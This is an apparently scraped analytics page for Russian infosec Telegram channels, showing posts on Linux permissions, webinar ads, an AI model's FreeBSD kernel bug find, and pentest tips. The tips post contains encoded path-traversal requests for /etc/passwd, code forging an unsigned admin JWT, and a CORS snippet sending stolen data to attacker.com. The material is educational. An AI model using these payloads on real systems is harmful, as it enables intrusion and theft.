| Канал | Публикаций | Подписчиков | Последний пост |
|---|---|---|---|
|
Бункер Хакера
[max]
|
3 | 106 | 15.05.26 |
ZeroDay | Кибербезопасно…
[telegram]
|
6 | 43036 | 15.05.26 |
|
Серверная Админа | Компь…
[max]
|
6 | 271 | 14.05.26 |
Бункер Хакера
[telegram]
|
1 | 21284 | 11.05.26 |
Серверная Админа | Компь…
[telegram]
|
2 | 26836 | 08.05.26 |
|
Похек
[max]
|
2 | 618 | 07.05.26 |
|
infosec
[max]
|
3 | 644 | 06.05.26 |
| Канал | Публикаций | Подписчиков | Последний пост |
|---|---|---|---|
|
Белый Хакер
[max]
|
3 | 117 | 15.05.26 |
|
Академия АйТи
[max]
|
1 | 139 | 15.05.26 |
|
infosec
[max]
|
3 | 644 | 06.05.26 |
|
Похек
[max]
|
2 | 618 | 06.05.26 |
|
IT мероприятия России / …
[max]
|
1 | 522 | 17.04.26 |
|
Ленивый вайб-программист
[max]
|
1 | 548 | 16.04.26 |
|
Импортозамещение в ИТ
[max]
|
1 | 1008 | 14.04.26 |
Загрузка данных...
| Размещенный пост | Текст публиакции | Рекламирующий канал | Просмотры | Просмотры 24 ч | Прирост подписчиков |
|---|
Загрузка данных...
| Размещенный пост | Текст публикации | Рекламируемый канал | Просмотры | Просмотры 24 ч | Прирост подписчиков |
|---|
| Дата и время публикации | Текст публикации | Рекламируемый канал | Динамика просмотров | Всего просмотров |
|---|---|---|---|---|
| 2026-05-16 16:07:45 | ZeroDay | #мем ZeroDay | #мем | — |
|
149 |
| 2026-05-15 13:04:17 | Права доступа в Linux: где чаще всего ошибаются? 👋 Приветствую в мире цифровой безопасности! Расскажу об основных правах доступа в Linux. ⏺Каждый файл в Linux имеет ровно одного владельца, одну группу и всех остальных. Девять битов прав делятся поровну между ними, по три на каждый класс. Выглядит это так: -rw-r----- 1 root shadow /etc/shadow root читает и пишет, группа shadow только читает, все остальные не получают вообще ничего. ⏺Самое важное, как ядро принимает решение о доступе. Проверка идёт строго по порядку и останавливается на первом совпадении. Сначала смотрит EUID процесса, если совпал с владельцем файла, берёт биты владельца и останавливается. Группа даже не проверяется. Поэтому файл с такими правами: ----rwx--- 1 ivan developers secret.txt недоступен для Ивана несмотря на то что его группа имеет полный доступ. Ядро увидело что ivan владелец, применило биты владельца (—) и остановилось. Права не суммируются, и это частая ловушка. ⏺SUID - бит который часто используют при эскалации привилегий: он заставляет процесс работать с правами владельца файла, а не того кто его запустил. Именно так обычный пользователь через passwd может писать в /etc/shadow, потому что passwd принадлежит root и имеет SUID. Если на системе внезапно появился SUID на bash, vim или find, это уже инцидент. Проверяется так: find / -perm -4000 -type f 2>/dev/null ⏺ACL нужен, когда стандартная модель не справляется: один владелец и одна группа - довольно жёсткое ограничение. Если нужно дать Марии права на запись, а условному Сергею только на чтение, UGO это не позволит. ACL решает задачу, но есть частая ошибка, настроить его без флага -d, тогда новые файлы создаваемые в директории его не наследуют: setfacl -R -m g:developers:rwx /project # для существующих файлов setfacl -d -m g:developers:rwx /project # для новых файлов ZeroDay | Белый Хакер | #Linux Права доступа в … |
|
|
181 |
| 2026-05-15 10:04:08 | Приглашаем на бесплатный вебинар «Резервное копирование: как проверить готовность к реальному инциденту» Резервные копии есть у всех. Но когда случается реальная атака шифровальщика, выясняется, что восстановить инфраструктуру в нужные сроки невозможно. Критические ошибки в backup-защите обнаруживаются именно тогда, когда исправлять уже поздно. На мероприятии директор техдепартамента RTM Group и гендиректор MEDOED Фёдор Музалевский разберет: 🔵 почему работающая система резервного копирования может не спасти бизнес; 🔵 как проверить backup-защиту (порядок действий и чек-лист); 🔵 какие ошибки встречаются чаще всего — на примере реального кейса аудита. Вебинар будет особенно полезен руководителям и специалистам по ИБ и ИТ, системным администраторам, отвечающим за резервное копирование, а также всем, кто хочет проверить, как их система защиты работает на практике, а не только на бумаге. 📆 Когда? 21 мая в 12:00 (online). 🔥Участие — бесплатное! Подробная программа и регистрация — по ссылке. Приглашаем на бе… | — |
|
71 |
| 2026-05-15 10:00:33 | С 1 марта 2026 Приказ ФСТЭК РФ №117 обязателен для ГИС и КИИ. Вместе с ФЗ №325 он меняет подход: безопасность — это не разовая аттестация, а непрерывный процесс. Что дальше: С 1 сентября 2026 ожидаются обновления в Приказах №235 и №239 с новыми показателям защищенности по методике ФСТЭК РФ. Регулятор требует не папку с документами, а работающую систему защиты. Приглашаем на бесплатный вебинар 21 мая в 11:00 мск, где разберём: ✅ как применять Приказ №117 в организации; ✅ как построить систему защиты по актуальным нормам; ✅ как снизить риски штрафов при проверках; ✅ как адаптировать процессы и документы под требования. Вы получите готовые алгоритмы и чек-листы для внедрения. Спикер: Эльшан Мамедов, к.ю.н., доцент, руководитель центра компетенций по кибербезопасности ИРНИТУ. 🔗 Регистрируйтесь прямо сейчас: https://tglink.io/7b4c5743816380?erid=2W5zFJjBdAR 📌 Подпишитесь на наш канал https://tglink.io/dc86e6a98e859c?erid=2W5zFJjBdAR #реклама О рекламодателе С 1 марта 2026 П… |
|
|
186 |
| 2026-05-14 18:41:06 | Claude Mythos и уязвимость, которая уже существовала (или нет?) 👋 Приветствую в мире цифровой безопасности! Anthropic заявила что их новая модель Mythos автономно нашла уязвимость в ядре FreeBSD и сразу написала рабочий эксплойт. Только история оказалась интереснее чем кажется… ⏺Уязвимость нашли в функции svc_rpc_gss_validate()сетевой файловой системы FreeBSD. Она выделяет на стеке 128-байтный буфер, записывает в него 32 байта заголовка и копирует туда же тело credentials, не проверяя размер. Если credentials больше 96 байт, данные выходят за пределы буфера и перезаписывают адрес возврата: int32_t rpchdr[128 / sizeof(int32_t)]; // записали 32 байта заголовка, осталось 96 if (oa->oa_length) { memcpy((caddr_t)buf, oa->oa_base, oa->oa_length); // нет проверки размера } Патч добавляет одну проверку до копирования: if (oa->oa_length > sizeof(rpchdr) - 8 * BYTES_PER_XDR_UNIT) { return (FALSE); } ⏺Но тут исследователи полезли в историю кода и нашли кое-что интересное: В 2007 году уже выходила CVE-2007-3999, практически идентичная уязвимость в той же функции, только в реализации MIT Kerberos. Код FreeBSD был скопирован из того же источника в начале 2000-х, патч так и не применили. Mythos по сути переоткрыла баг который уже был в её обучающих данных. ⏺Это не значит что достижение нейронки - ненастоящее: Автономно пройти путь от чтения незнакомого кода до рабочего эксплойта ядра, это серьёзно. Но разница между «ИИ нашёл новую уязвимость» и «ИИ переоткрыл старый паттерн из обучающих данных» принципиальная. ⏺Но тут главная проблема в другом: LLM генерируют код на основе данных, в которых полно небезопасных паттернов. Те же паттерны оседают в новых кодовых базах, и следующий агент найдёт их быстро, дёшево и без лишнего шума. ZeroDay | Белый Хакер | #AI Claude Mythos и … |
|
|
211 |
| 2026-05-13 13:31:11 | 3 лайфхака для пентестинга 👋 Приветствую в мире цифровой безопасности! Расскажу ещё о трех полезных фишках про пентесте. ⏺Path Traversal через кодирование: простой ../ давно фильтруется, но обходы через различные варианты кодирования до сих пор работают на многих сервисах. GET /download?file=../../../etc/passwd # блокируется GET /download?file=%2e%2e%2f%2e%2e%2fetc/passwd # URL-кодирование GET /download?file=..%2f..%2fetc/passwd # частичное кодирование GET /download?file=....//....//etc/passwd # двойной слеш Если сервер декодирует перед проверкой - один из вариантов пройдёт. ⏺JWT с алгоритмом none: если сервер не проверяет алгоритм подписи строго, можно передать токен без подписи вообще. import base64, json header = base64.urlsafe_b64encode( json.dumps({"alg":"none","typ":"JWT"}).encode() ).rstrip(b'=').decode() payload = base64.urlsafe_b64encode( json.dumps({"sub":"1","role":"admin"}).encode() ).rstrip(b'=').decode() token = f"{header}.{payload}." Сервер принимает токен, видит role:admin и пускает. Встречается реже чем раньше, но в legacy-системах живёт. ⏺CORS misconfiguration - читаем ответы с чужого origin: если сервер отвечает Access-Control-Allow-Origin на любой Origin из запроса, можно читать приватные API-ответы из браузера жертвы. fetch('https://target.com/api/profile', { credentials: 'include' }) .then(r => r.text()) .then(data => fetch('https://attacker.com/?d=' + btoa(data))) Проверяется просто: отправляем Origin: https://evil.com и смотрим что вернёт сервер в заголовках. ZeroDay | Белый Хакер | #пентест 3 лайфхака для п… |
|
|
295 |
Загрузка данных...
| Время | Контент | Подписчиков | Кто ссылался | Просмотры 48ч | Просмотры 24ч |
|---|